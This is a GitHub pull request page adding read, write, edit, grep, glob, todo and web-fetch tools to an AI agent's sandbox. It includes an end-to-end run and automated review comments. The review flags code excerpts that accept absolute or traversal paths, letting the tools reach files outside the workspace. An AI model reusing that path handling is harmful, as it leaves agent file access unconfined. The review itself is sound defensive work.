feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… by sweetmantech · Pull Request #585 · recoupable/api

sweetmantech · 2026-05-21T18:30:45Z

…/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing.
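A minimal sketch of that plumbing. It assumes the agent loop passes `{ sandbox }` as `experimental_context` and that a leaf tool's `execute` receives it in its second (options) argument. The `Sandbox` interface, `getSandbox`, and `readSnippet` are illustrative stand-ins, not api's actual code.

```typescript
// Illustrative subset of a sandbox handle; api's real Sandbox interface is richer.
interface Sandbox {
  workingDirectory: string;
  readFile(path: string, encoding: "utf-8"): Promise<string>;
}

// Per-call options a tool's execute() receives; only the field used here is modeled.
interface ToolCallOptions {
  experimental_context?: unknown;
}

// Assumed helper: pull the sandbox out of the opaque experimental_context.
function getSandbox(options: ToolCallOptions): Sandbox {
  const ctx = options.experimental_context as { sandbox?: Sandbox } | undefined;
  if (!ctx?.sandbox) {
    throw new Error("experimental_context is missing a sandbox");
  }
  return ctx.sandbox;
}

// Hypothetical leaf tool body: it never creates a sandbox, it only uses the injected one.
async function readSnippet(input: { filePath: string }, options: ToolCallOptions): Promise<string> {
  const sandbox = getSandbox(options);
  const content = await sandbox.readFile(`${sandbox.workingDirectory}/${input.filePath}`, "utf-8");
  return content.split("\n")[0] ?? "";
}
```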

New tool files (one tool per file, following sweetman's single-responsibility (SRP) convention):

- readFileTool.ts: read with 1-indexed offset/limit, numbered output
- writeFileTool.ts: create or overwrite via sandbox.writeFile, creating parent directories first (`mkdir -p` semantics)
- editFileTool.ts: exact-string replace, ambiguous-match rejection
- grepTool.ts: POSIX ERE search via `grep -rn`, capped at 100 matches total / 10 per file / 200 chars per line
- globTool.ts: `find -printf` listing sorted by mtime, with a BSD `stat` fallback for GNU/BSD compatibility
- todoWriteTool.ts: stateless planning surface; echoes the list back
- webFetchTool.ts: `curl` from inside the sandbox, response body truncated at 10KB
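The read tool's windowing can be sketched as a pure function. The slicing mirrors the `offset`/`limit` arithmetic quoted in cubic's review further down; the `readWindow` name and the `ReadWindow` return shape are assumptions for illustration.

```typescript
interface ReadWindow {
  content: string; // selected lines, each prefixed with its 1-indexed line number
  totalLines: number;
  startLine: number; // 1-indexed first line returned
  endLine: number; // 1-indexed last line returned (inclusive)
}

// offset is 1-indexed; limit is the maximum number of lines to return.
function readWindow(content: string, offset: number, limit: number): ReadWindow {
  const lines = content.split("\n");
  const start = Math.max(1, offset) - 1; // convert to a 0-indexed slice start
  const end = Math.min(lines.length, start + limit);
  const numbered = lines.slice(start, end).map((line, i) => `${start + i + 1}: ${line}`);
  return {
    content: numbered.join("\n"),
    totalLines: lines.length,
    startLine: start + 1,
    endLine: end,
  };
}
```

For example, `readWindow("a\nb\nc\nd", 2, 2)` returns lines 2 and 3 as `"2: b\n3: c"`.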

New helpers (utilities used by multiple tools):

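- shellEscape.ts: wraps an argument in single quotes, rewriting each embedded `'` as `'\''`
- toDisplayPath.ts: converts an absolute path to a workdir-relative display path when the file lies inside the working directory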
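A minimal sketch of the two helpers, assuming a POSIX shell and a Linux sandbox (hence `path.posix`). Returning `"."` for the working directory itself is an assumption; the real helpers may differ in edge cases.

```typescript
import { posix as path } from "node:path";

// Wrap an argument in single quotes; each embedded ' becomes '\'' (close quote,
// escaped literal quote, reopen quote), so the shell sees one literal word.
function shellEscape(arg: string): string {
  return `'${arg.replace(/'/g, `'\\''`)}'`;
}

// Show paths inside the working directory relative to it; leave others absolute.
function toDisplayPath(absolutePath: string, workingDirectory: string): string {
  const rel = path.relative(workingDirectory, absolutePath);
  if (rel === "") return ".";
  const outside = rel === ".." || rel.startsWith("../");
  return outside ? absolutePath : rel;
}
```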

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (task, ask_user_question, skill) need subagent context, UI rendering, and skill-discovery infrastructure that api doesn't have today, so they land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds.

Summary by cubic

Add seven sandbox leaf tools (read, write, edit, grep, glob, todo_write, web_fetch) and register them in buildAgentTools to enable file ops, search, planning, and HTTP fetch from inside the sandbox. Includes helpers and tests; composite tools will follow later.

New Features
- read: Numbered output with 1-indexed offset/limit; rejects directories.
- write: Creates parent dirs and overwrites file content.
- edit: Exact-string replace; rejects ambiguous matches unless replaceAll; returns startLine and count.
- grep: POSIX ERE via grep -rn; caps to 100 total/10 per file/200 chars per line; exit 1 = no matches.
- glob: GNU/BSD-compatible find; mtime-sorted; skips dotfiles and node_modules; default limit 100.
- todo_write: Stateless planning surface that echoes the full todo list.
- web_fetch: curl inside the sandbox with method/headers/body; body truncated at 10KB; returns status.
- Helpers: shellEscape for safe shell args; toDisplayPath for workspace-relative display paths.
- buildAgentTools: Registers bash + the 7 new tools as direct exports; adds tests for tools, helpers, and factory.
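The grep caps and exit-code rule can be sketched as a parser over `grep -rn` output (`file:line:content` per match). The function names and result shape are illustrative; only the limits (100 total, 10 per file, 200 chars per line) and "exit 1 means no matches" come from the summary above. File names that themselves contain `:<digits>:` would confuse this simple regex.

```typescript
interface GrepMatch {
  file: string;
  line: number;
  content: string;
}

type GrepResult =
  | { success: true; matches: GrepMatch[]; filesWithMatches: number }
  | { success: false; error: string };

const MAX_TOTAL = 100;
const MAX_PER_FILE = 10;
const MAX_LINE_CHARS = 200;

// Parse `grep -rn` stdout ("file:line:content") while enforcing the caps.
function parseGrepOutput(stdout: string): GrepMatch[] {
  const matches: GrepMatch[] = [];
  const perFile = new Map<string, number>();
  for (const raw of stdout.split("\n")) {
    if (matches.length >= MAX_TOTAL) break;
    const m = /^(.*?):(\d+):(.*)$/.exec(raw);
    if (!m) continue; // skips the trailing blank line and anything unparseable
    const [, file, lineNo, text] = m;
    const seen = perFile.get(file) ?? 0;
    if (seen >= MAX_PER_FILE) continue;
    perFile.set(file, seen + 1);
    matches.push({ file, line: Number(lineNo), content: text.slice(0, MAX_LINE_CHARS) });
  }
  return matches;
}

// grep exits 0 when lines matched, 1 when none matched, and >1 on errors.
function interpretGrep(exitCode: number, stdout: string, stderr: string): GrepResult {
  if (exitCode === 1) return { success: true, matches: [], filesWithMatches: 0 };
  if (exitCode !== 0) return { success: false, error: stderr.trim() || `grep exited with ${exitCode}` };
  const matches = parseGrepOutput(stdout);
  return { success: true, matches, filesWithMatches: new Set(matches.map((m) => m.file)).size };
}
```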
Refactors
- Harmonized tool exports to direct values (no factory wrappers); updated buildAgentTools and tests accordingly.

Written for commit df648cd. Summary will update on new commits.

…/glob/todo/web_fetch (PR 5)

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

vercel · 2026-05-21T18:30:51Z

The latest updates on your projects.

Project	Deployment	Actions	Updated (UTC)
api	Ready	Preview	May 21, 2026 6:43pm

coderabbitai · 2026-05-21T18:30:53Z

Warning

Rate limit exceeded

@sweetmantech has exceeded the limit for the number of commits that can be reviewed per hour. Please wait 31 minutes and 20 seconds before requesting another review.

You’ve run out of usage credits. Purchase more in the billing tab.

ℹ️ Review info

⚙️ Run configuration

Configuration used: Path: .coderabbit.yaml

Review profile: CHILL

Plan: Pro

Run ID: d85dc8b2-1ee7-4cc4-9aa1-73bd37c36a98

📥 Commits

Reviewing files that changed from the base of the PR and between c16533d and df648cd.

⛔ Files ignored due to path filters (11)

lib/agent/__tests__/buildAgentTools.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/bashTool.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/editFileTool.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/globTool.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/grepTool.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/readFileTool.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/shellEscape.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/toDisplayPath.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/todoWriteTool.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/webFetchTool.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**
lib/agent/tools/__tests__/writeFileTool.test.ts is excluded by !**/*.test.*, !**/__tests__/** and included by lib/**

📒 Files selected for processing (11)

lib/agent/buildAgentTools.ts
lib/agent/tools/bashTool.ts
lib/agent/tools/editFileTool.ts
lib/agent/tools/globTool.ts
lib/agent/tools/grepTool.ts
lib/agent/tools/readFileTool.ts
lib/agent/tools/shellEscape.ts
lib/agent/tools/toDisplayPath.ts
lib/agent/tools/todoWriteTool.ts
lib/agent/tools/webFetchTool.ts
lib/agent/tools/writeFileTool.ts

sweetmantech · 2026-05-21T18:34:29Z

Multi-tool E2E verified on preview ✅

Preview URL: `https://api-git-feat-api-chat-workflow-leaf-tools-recoup.vercel.app`

Set up a sandbox against `recoupable/org-rostrum-pacific-cebcc866-...` (a real org repo, so `extractOrgId` also got exercised) and sent the prompt:

"Use your tools to do the following: (1) glob the repo to find all top-level files, (2) read the README, (3) summarize the project in 2 sentences."

Tools the agent autonomously invoked

Step	Tool	Args
1	`glob`	`{ pattern: "*", path: "." }`
2	`read`	`{ filePath: "README.md" }`
3	`bash`	`{ command: "find . -maxdepth 1 -type f
4	`read`	`{ filePath: "RELEASES_SUMMARY.md" }`
5	`bash`	`{ command: "ls -la" }`

`x-workflow-run-id: wrun_01KS5WY1GFDJ5TMADZRPQDRYNA`

Model wrap-up (`finishReason: "stop"`)

"This is a music label organization workspace (Rostrum Pacific) that tracks artist releases and project metadata in a structured, git-based format. The sandbox contains release information for multiple artists (Gatsby Grace, LIKE, and Onchain Experiments), including tracklists, ISRCs, UPCs, asset statuses, and critical action items needed before distribution to streaming platforms."

The model identified the workspace correctly, used multiple tools in sequence, fell back from `glob` to `bash` when it wanted more detail, and produced a coherent two-sentence summary — exactly the multi-tool agentic behavior PR 5 was meant to unlock.

Tools not exercised in this E2E

`write`, `edit`, `web_fetch`, `todo_write` weren't called because the prompt didn't ask for writes/edits/HTTP/planning. They're unit-tested in the suite (50 new tests, 3014/3014 pass). Happy to run a separate write/edit E2E if you'd like to see them in action against a real sandbox before merge.

Verification recap

- Full suite: 3014/3014 pass
- Lint: clean
- Production build: succeeds
- Vercel deploy: success
- E2E (above): glob + read + bash interleaving works; the model wrap-up turn works via the `CHAT_AGENT_STOP_WHEN` stop condition shared from PR 4

cubic-dev-ai

12 issues found across 20 files

Confidence score: 2/5

There is a high-confidence workspace-boundary/security risk across multiple tools: lib/agent/tools/writeFileTool.ts, lib/agent/tools/editFileTool.ts, lib/agent/tools/readFileTool.ts, and lib/agent/tools/globTool.ts accept absolute or traversal-style paths, which can allow reads/writes/searches outside workingDirectory.
Additional input-validation gaps in lib/agent/tools/globTool.ts and lib/agent/tools/readFileTool.ts (limit not constrained to positive integers) and lib/agent/tools/editFileTool.ts (empty oldString) could produce incorrect or unexpectedly broad file operations.
Behavioral consistency issues (GNU/BSD fallback and hidden-file handling) in lib/agent/tools/globTool.ts and lib/agent/tools/grepTool.ts, plus schema-contract drift in lib/agent/tools/todoWriteTool.ts, increase regression risk even if core flows still work.
Pay close attention to lib/agent/tools/writeFileTool.ts, lib/agent/tools/editFileTool.ts, lib/agent/tools/readFileTool.ts, and lib/agent/tools/globTool.ts - path confinement to workspace root is the key merge risk.
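One way to close the P1 path findings is a single resolver shared by read, write, edit, and glob. The sketch below uses a hypothetical `resolveInsideWorkspace` name and checks confinement lexically: it normalizes `..` segments and rejects anything that lands outside `workingDirectory`. It does not follow symlinks, so a link inside the workspace that points elsewhere would still need a `realpath` check inside the sandbox.

```typescript
import { posix as path } from "node:path";

// Resolve a tool-supplied path against the workspace root and refuse escapes.
// Absolute paths are accepted only if they already point inside the root.
function resolveInsideWorkspace(workingDirectory: string, filePath: string): string {
  const root = path.resolve(workingDirectory);
  const resolved = path.resolve(root, filePath); // an absolute filePath replaces root here
  const rel = path.relative(root, resolved);
  if (rel === ".." || rel.startsWith("../")) {
    throw new Error(`Path is outside the workspace: ${filePath}`);
  }
  return resolved;
}
```

Each tool could call this inside its existing `try` block so a rejection surfaces as a `{ success: false, error }` result rather than an uncaught exception.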

Prompt for AI agents (unresolved issues)


Check if these issues are valid — if so, understand the root cause of each and fix them. If appropriate, use sub-agents to investigate and fix each issue separately.


<file name="lib/agent/tools/readFileTool.ts">

<violation number="1" location="lib/agent/tools/readFileTool.ts:39">
P1: The tool allows path traversal/out-of-workspace reads because it does not constrain `filePath` to the workspace root.</violation>

<violation number="2" location="lib/agent/tools/readFileTool.ts:54">
P2: `limit` is not validated as a positive integer, so negative/decimal values produce incorrect line ranges.</violation>
</file>

<file name="lib/agent/tools/grepTool.ts">

<violation number="1" location="lib/agent/tools/grepTool.ts:73">
P2: Hidden files are not excluded: only hidden directories are skipped. Add a file-level exclude pattern so behavior matches the documented contract.</violation>
</file>

<file name="lib/agent/tools/globTool.ts">

<violation number="1" location="lib/agent/tools/globTool.ts:20">
P2: `limit` should be validated as a positive integer; currently invalid numeric values can reach `head -n` and produce unexpected output sizes.</violation>

<violation number="2" location="lib/agent/tools/globTool.ts:66">
P1: `path` is documented as workspace-relative, but absolute paths are accepted, allowing glob searches outside the workspace directory.</violation>

<violation number="3" location="lib/agent/tools/globTool.ts:118">
P2: The BSD fallback is triggered by any non-zero GNU `find` exit code, so partial failures can cause a second traversal and inconsistent/duplicated results.</violation>
</file>

<file name="lib/agent/tools/todoWriteTool.ts">

<violation number="1" location="lib/agent/tools/todoWriteTool.ts:55">
P2: The schema documents that only one todo may be `in_progress`, but it does not enforce this. Add a refinement so invalid multi-`in_progress` lists are rejected instead of silently accepted.</violation>
</file>

<file name="lib/agent/tools/writeFileTool.ts">

<violation number="1" location="lib/agent/tools/writeFileTool.ts:48">
P1: `filePath` is not constrained to the workspace directory, so absolute/`..` paths can write outside the intended workspace.</violation>
</file>

<file name="lib/agent/tools/editFileTool.ts">

<violation number="1" location="lib/agent/tools/editFileTool.ts:9">
P2: Disallow empty `oldString`; an empty match turns replacement into a whole-file character-level transformation.</violation>

<violation number="2" location="lib/agent/tools/editFileTool.ts:61">
P1: Validate `filePath` stays within `workingDirectory`; current logic allows editing arbitrary absolute/traversed paths.</violation>
</file>

<file name="lib/agent/tools/__tests__/grepTool.test.ts">

<violation number="1" location="lib/agent/tools/__tests__/grepTool.test.ts:44">
P3: Custom agent: **Enforce Clear Code Style and Maintainability Practices**

This new test module exceeds the repository’s 100-line limit for lib/**/*.ts files.</violation>
</file>
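A minimal sketch of the single-`in_progress` rule from the todoWriteTool finding. It is plain TypeScript so it runs without dependencies; in the real zod schema the same predicate would sit in a `.refine()` on the `todos` array. The `Todo` field names and status values are assumptions; the echo message format is taken from the E2E log later in this thread.

```typescript
type TodoStatus = "pending" | "in_progress" | "completed";

interface Todo {
  id: string;
  content: string;
  status: TodoStatus;
}

type TodoResult =
  | { success: true; message: string; todos: Todo[] }
  | { success: false; error: string };

// Stateless: validate the list, then echo it back unchanged.
function todoWrite(todos: Todo[]): TodoResult {
  const inProgress = todos.filter((t) => t.status === "in_progress").length;
  if (inProgress > 1) {
    return { success: false, error: `At most one todo may be in_progress (got ${inProgress})` };
  }
  return { success: true, message: `Updated task list with ${todos.length} items`, todos };
}
```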

Architecture diagram

sequenceDiagram
    participant LLM as AI Model (LLM)
    participant Exe as streamText execute
    participant ToolFactory as buildAgentTools()
    participant Read as readFileTool
    participant Write as writeFileTool
    participant Edit as editFileTool
    participant Grep as grepTool
    participant Glob as globTool
    participant Todo as todoWriteTool
    participant Fetch as webFetchTool
    participant Bash as bashTool
    participant GetSB as getSandbox()
    participant Sandbox as Sandbox Instance
    participant Filesys as Sandbox Filesystem
    participant External as External HTTP API

    Note over LLM,External: Agent invokes sandbox leaf tools via LLM tool calls

    LLM->>Exe: tool call (e.g., read, write, grep)
    Exe->>ToolFactory: resolve tool by name

    alt File Operation Tools
        Exe->>Read: execute({filePath, offset, limit})
        Read->>GetSB: get sandbox from experimental_context
        GetSB-->>Read: sandbox handle
        Read->>Sandbox: stat(filePath)
        Sandbox-->>Read: file stat
        alt Is Directory
            Read-->>Exe: error: "Cannot read a directory"
        else Is File
            Read->>Sandbox: readFile(filePath)
            Sandbox-->>Read: file content
            Read->>Read: apply offset/limit, number lines
            Read-->>Exe: success {content, totalLines, startLine, endLine}
        end

        Exe->>Write: execute({filePath, content})
        Write->>GetSB: get sandbox
        Write->>Sandbox: mkdir(dir, {recursive: true})
        Write->>Sandbox: writeFile(filePath, content)
        Write->>Sandbox: stat(filePath)
        Sandbox-->>Write: file stat
        Write-->>Exe: success {path, bytesWritten}

        Exe->>Edit: execute({filePath, oldString, newString, replaceAll})
        Edit->>GetSB: get sandbox
        Edit->>Sandbox: readFile(filePath)
        Sandbox-->>Edit: file content
        alt oldString not found
            Edit-->>Exe: error: "oldString not found"
        else multiple occurrences && !replaceAll
            Edit-->>Exe: error: ambiguous match
        else single or replaceAll
            Edit->>Edit: perform replacement(s)
            Edit->>Sandbox: writeFile(filePath, newContent)
            Edit-->>Exe: success {replacements, startLine}
        end

    else Search Tools
        Exe->>Grep: execute({pattern, path, glob, caseSensitive})
        Grep->>GetSB: get sandbox
        Grep->>Sandbox: exec(`grep -rn ...`)
        Sandbox-->>Grep: grep results
        alt Exit code 1 (no matches)
            Grep-->>Exe: success {matchCount: 0}
        else Exit code 0
            Grep->>Grep: parse file:line:content, cap at 100/10/200
            Grep-->>Exe: success {matches, filesWithMatches}
        else Other exit code
            Grep-->>Exe: error {error: grep failure}
        end

        Exe->>Glob: execute({pattern, path, limit})
        Glob->>GetSB: get sandbox
        Glob->>Sandbox: exec(`find ... -printf ... | sort ... | head -n`)
        Sandbox-->>Glob: file listing
        alt Exit 0 or 1
            Glob->>Glob: parse mtime/size/path, convert to display path
            Glob-->>Exe: success {files, count}
        else Other exit
            Glob-->>Exe: error {error: glob failure}
        end

    else Web Fetch Tool
        Exe->>Fetch: execute({url, method, headers, body})
        Fetch->>GetSB: get sandbox
        GetSB-->>Fetch: sandbox handle
        Fetch->>Fetch: buildRecoupExecEnv() for proxy credentials
        Fetch->>Sandbox: exec(`curl -sS -X ...` with fd 3 split)
        Sandbox-->>Fetch: curl output + status code
        alt Exit 0
            Fetch->>Fetch: parse status from last line
            Fetch-->>Exe: success {status, body, truncated: false}
        else Exit 23 (body truncated)
            Fetch->>Fetch: parse status, body already truncated
            Fetch-->>Exe: success {status, body, truncated: true}
        else Other exit
            Fetch-->>Exe: error {error: fetch failed}
        end

    else Stateless Planning Tool
        Exe->>Todo: execute({todos})
        Note over Todo: Stateless: echoes todos back
        Todo-->>Exe: success {message, todos}
    end

    Exe-->>LLM: tool result
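The web_fetch result handling in the diagram can be sketched as a parser over curl's captured output. It assumes the command arranges for the HTTP status to arrive as the final line of stdout (for example via curl's `--write-out '%{http_code}'`); how api actually splits body and status using fd 3 is not modeled. Exit 23 is curl's write-error code, which curl reports when a downstream byte cap closes the pipe early, hence `truncated: true`. `parseCurlResult` is a hypothetical name.

```typescript
type FetchResult =
  | { success: true; status: number; body: string; truncated: boolean }
  | { success: false; error: string };

function parseCurlResult(exitCode: number, stdout: string, stderr: string): FetchResult {
  // 0 = complete; 23 = curl write error, i.e. the body was cut off downstream.
  if (exitCode !== 0 && exitCode !== 23) {
    return { success: false, error: stderr.trim() || `curl exited with code ${exitCode}` };
  }
  const out = stdout.trimEnd();
  const cut = out.lastIndexOf("\n");
  const statusText = out.slice(cut + 1); // last line carries the HTTP status
  const status = Number.parseInt(statusText, 10);
  if (!Number.isInteger(status)) {
    return { success: false, error: `could not parse HTTP status from "${statusText}"` };
  }
  return { success: true, status, body: cut === -1 ? "" : out.slice(0, cut), truncated: exitCode === 23 };
}
```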

cubic-dev-ai · 2026-05-21T18:35:23Z

+      try {
+        let searchDir: string;
+        if (basePath) {
+          searchDir = path.isAbsolute(basePath)


P1: path is documented as workspace-relative, but absolute paths are accepted, allowing glob searches outside the workspace directory.

Prompt for AI agents

Check if this issue is valid — if so, understand the root cause and fix it. At lib/agent/tools/globTool.ts, line 66: <comment>`path` is documented as workspace-relative, but absolute paths are accepted, allowing glob searches outside the workspace directory.</comment> <file context> @@ -0,0 +1,168 @@ + try { + let searchDir: string; + if (basePath) { + searchDir = path.isAbsolute(basePath) + ? basePath + : path.resolve(workingDirectory, basePath); </file context>

cubic-dev-ai · 2026-05-21T18:35:23Z

+      const workingDirectory = sandbox.workingDirectory;
+
+      try {
+        const absolutePath = path.isAbsolute(filePath)


P1: filePath is not constrained to the workspace directory, so absolute/.. paths can write outside the intended workspace.

Prompt for AI agents

Check if this issue is valid — if so, understand the root cause and fix it. At lib/agent/tools/writeFileTool.ts, line 48: <comment>`filePath` is not constrained to the workspace directory, so absolute/`..` paths can write outside the intended workspace.</comment> <file context> @@ -0,0 +1,66 @@ + const workingDirectory = sandbox.workingDirectory; + + try { + const absolutePath = path.isAbsolute(filePath) + ? filePath + : path.resolve(workingDirectory, filePath); </file context>

cubic-dev-ai · 2026-05-21T18:35:23Z

+          return { success: false, error: "oldString and newString must be different" };
+        }
+
+        const absolutePath = path.isAbsolute(filePath)


P1: Validate filePath stays within workingDirectory; current logic allows editing arbitrary absolute/traversed paths.

Prompt for AI agents

Check if this issue is valid — if so, understand the root cause and fix it. At lib/agent/tools/editFileTool.ts, line 61: <comment>Validate `filePath` stays within `workingDirectory`; current logic allows editing arbitrary absolute/traversed paths.</comment> <file context> @@ -0,0 +1,101 @@ + return { success: false, error: "oldString and newString must be different" }; + } + + const absolutePath = path.isAbsolute(filePath) + ? filePath + : path.resolve(workingDirectory, filePath); </file context>

cubic-dev-ai · 2026-05-21T18:35:23Z

+      const workingDirectory = sandbox.workingDirectory;
+
+      try {
+        const absolutePath = path.isAbsolute(filePath)


P1: The tool allows path traversal/out-of-workspace reads because it does not constrain filePath to the workspace root.

Prompt for AI agents

Check if this issue is valid — if so, understand the root cause and fix it. At lib/agent/tools/readFileTool.ts, line 39: <comment>The tool allows path traversal/out-of-workspace reads because it does not constrain `filePath` to the workspace root.</comment> <file context> @@ -0,0 +1,71 @@ + const workingDirectory = sandbox.workingDirectory; + + try { + const absolutePath = path.isAbsolute(filePath) + ? filePath + : path.resolve(workingDirectory, filePath); </file context>

cubic-dev-ai · 2026-05-21T18:35:23Z

+        const findBase = findArgs.join(" ");
+        const command = [
+          `{ ${findBase} -printf '%T@\\t%s\\t%p\\n' 2>/dev/null`,
+          `|| ${findBase} -print0 | xargs -0 stat -f '%m%t%z%t%N' ; }`,


P2: The BSD fallback is triggered by any non-zero GNU find exit code, so partial failures can cause a second traversal and inconsistent/duplicated results.

Prompt for AI agents

Check if this issue is valid — if so, understand the root cause and fix it. At lib/agent/tools/globTool.ts, line 118: <comment>The BSD fallback is triggered by any non-zero GNU `find` exit code, so partial failures can cause a second traversal and inconsistent/duplicated results.</comment> <file context> @@ -0,0 +1,168 @@ + const findBase = findArgs.join(" "); + const command = [ + `{ ${findBase} -printf '%T@\\t%s\\t%p\\n' 2>/dev/null`, + `|| ${findBase} -print0 | xargs -0 stat -f '%m%t%z%t%N' ; }`, + `| sort -t$'\\t' -k1 -rn | head -n ${limit}`, + ].join(" "); </file context>
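One way to address the fallback finding is to probe for `-printf` support with a zero-depth `find`, then run exactly one traversal. The sketch reuses the GNU and BSD format strings quoted above; `buildGlobCommand` and `parseGlobLines` are hypothetical names, and like the original it relies on bash for `$'\t'`. It also rejects a non-positive-integer `limit` before interpolating it into `head -n`.

```typescript
interface GlobEntry {
  mtime: number; // seconds since epoch (GNU %T@ may include a fraction)
  size: number; // bytes
  path: string;
}

function buildGlobCommand(findBase: string, limit: number): string {
  if (!Number.isInteger(limit) || limit < 1) {
    throw new RangeError(`limit must be a positive integer (got ${limit})`);
  }
  // GNU find accepts -printf and prints nothing here; BSD find rejects the
  // unknown primary. With -maxdepth 0, neither walks the tree.
  const probe = "find . -maxdepth 0 -printf '' >/dev/null 2>&1";
  const gnu = `${findBase} -printf '%T@\\t%s\\t%p\\n'`;
  const bsd = `${findBase} -print0 | xargs -0 stat -f '%m%t%z%t%N'`;
  // Exactly one branch traverses, so a partial GNU failure cannot trigger a second pass.
  return `{ if ${probe}; then ${gnu}; else ${bsd}; fi; } | sort -t$'\\t' -k1 -rn | head -n ${limit}`;
}

// Parse "mtime<TAB>size<TAB>path" lines produced by either branch.
function parseGlobLines(stdout: string): GlobEntry[] {
  return stdout
    .split("\n")
    .filter((line) => line.length > 0)
    .map((line) => {
      const [mtime, size, ...rest] = line.split("\t");
      return { mtime: Number(mtime), size: Number(size), path: rest.join("\t") };
    });
}
```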

cubic-dev-ai · 2026-05-21T18:35:23Z

+
+const editInputSchema = z.object({
+  filePath: z.string().describe("Workspace-relative path to the file to edit (e.g., src/auth.ts)"),
+  oldString: z.string().describe("The exact text to replace"),


P2: Disallow empty oldString; an empty match turns replacement into a whole-file character-level transformation.

Prompt for AI agents

Check if this issue is valid — if so, understand the root cause and fix it. At lib/agent/tools/editFileTool.ts, line 9: <comment>Disallow empty `oldString`; an empty match turns replacement into a whole-file character-level transformation.</comment> <file context> @@ -0,0 +1,101 @@ + +const editInputSchema = z.object({ + filePath: z.string().describe("Workspace-relative path to the file to edit (e.g., src/auth.ts)"), + oldString: z.string().describe("The exact text to replace"), + newString: z.string().describe("The text to replace it with (must differ from oldString)"), + replaceAll: z.boolean().optional().describe("Replace all occurrences. Default: false"), </file context>
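A pure-function sketch of the edit semantics with the empty-`oldString` guard added. `applyEdit` is an illustrative name, and every error string except "must be different" is an assumption. It counts occurrences with `split` (non-overlapping matches) and passes a function to `String.prototype.replace` so `$&`-style sequences in `newString` are inserted literally.

```typescript
type EditResult =
  | { success: true; content: string; replacements: number; startLine: number }
  | { success: false; error: string };

function applyEdit(content: string, oldString: string, newString: string, replaceAll = false): EditResult {
  if (oldString.length === 0) return { success: false, error: "oldString must not be empty" };
  if (oldString === newString) return { success: false, error: "oldString and newString must be different" };
  const first = content.indexOf(oldString);
  if (first === -1) return { success: false, error: "oldString not found" };
  const count = content.split(oldString).length - 1; // non-overlapping occurrences
  if (count > 1 && !replaceAll) {
    return { success: false, error: `oldString matches ${count} times; add context or set replaceAll` };
  }
  const updated = replaceAll
    ? content.split(oldString).join(newString)
    : content.replace(oldString, () => newString); // function form: no $-pattern expansion
  const startLine = content.slice(0, first).split("\n").length; // 1-indexed line of first match
  return { success: true, content: updated, replacements: replaceAll ? count : 1, startLine };
}
```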

cubic-dev-ai · 2026-05-21T18:35:23Z

+        const content = await sandbox.readFile(absolutePath, "utf-8");
+        const lines = content.split("\n");
+        const startLine = Math.max(1, offset) - 1;
+        const endLine = Math.min(lines.length, startLine + limit);


P2: limit is not validated as a positive integer, so negative/decimal values produce incorrect line ranges.

Prompt for AI agents

Check if this issue is valid — if so, understand the root cause and fix it. At lib/agent/tools/readFileTool.ts, line 54: <comment>`limit` is not validated as a positive integer, so negative/decimal values produce incorrect line ranges.</comment> <file context> @@ -0,0 +1,71 @@ + const content = await sandbox.readFile(absolutePath, "utf-8"); + const lines = content.split("\n"); + const startLine = Math.max(1, offset) - 1; + const endLine = Math.min(lines.length, startLine + limit); + const selectedLines = lines.slice(startLine, endLine); + const numberedLines = selectedLines.map((line, i) => `${startLine + i + 1}: ${line}`); </file context>
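With the arithmetic above, a negative `limit` makes `endLine` smaller than `startLine`, so `slice` returns no lines, and a fractional one is silently truncated by `slice`. A small guard, sketched here under the hypothetical name `parsePositiveInt`, rejects both before the window is computed; in the zod input schema the equivalent is `z.number().int().positive()`.

```typescript
type ParsedInt = { ok: true; value: number } | { ok: false; error: string };

// Accept undefined (use the default) or a positive integer; reject everything else.
function parsePositiveInt(name: string, value: unknown, fallback: number): ParsedInt {
  if (value === undefined) return { ok: true, value: fallback };
  if (typeof value !== "number" || !Number.isInteger(value) || value < 1) {
    return { ok: false, error: `${name} must be a positive integer (got ${String(value)})` };
  }
  return { ok: true, value };
}
```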

cubic-dev-ai · 2026-05-21T18:35:23Z

+        const args: string[] = ["grep", "-rn"];
+        if (!caseSensitive) args.push("-i");
+        args.push(
+          `--exclude-dir=${shellEscape(".*")}`,


P2: Hidden files are not excluded: only hidden directories are skipped. Add a file-level exclude pattern so behavior matches the documented contract.

Prompt for AI agents

Check if this issue is valid — if so, understand the root cause and fix it. At lib/agent/tools/grepTool.ts, line 73: <comment>Hidden files are not excluded: only hidden directories are skipped. Add a file-level exclude pattern so behavior matches the documented contract.</comment> <file context> @@ -0,0 +1,144 @@ + const args: string[] = ["grep", "-rn"]; + if (!caseSensitive) args.push("-i"); + args.push( + `--exclude-dir=${shellEscape(".*")}`, + `--exclude-dir=${shellEscape("node_modules")}`, + ); </file context>
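A sketch of the argument list with the file-level exclusion the finding asks for. In GNU grep, `--exclude=GLOB` skips files whose base name matches during a recursive search, just as `--exclude-dir=GLOB` does for directories, so `'.*'` skips dotfiles. The `-E` flag (for the ERE mode the PR describes), the `-e`/`--` guards, and the `include` parameter are assumptions about how the rest of the command is assembled.

```typescript
// Single-quote an argument for a POSIX shell; each embedded ' becomes '\''.
function shellEscape(arg: string): string {
  return `'${arg.replace(/'/g, `'\\''`)}'`;
}

function buildGrepCommand(pattern: string, searchPath: string, caseSensitive: boolean, include?: string): string {
  const args: string[] = ["grep", "-rnE"];
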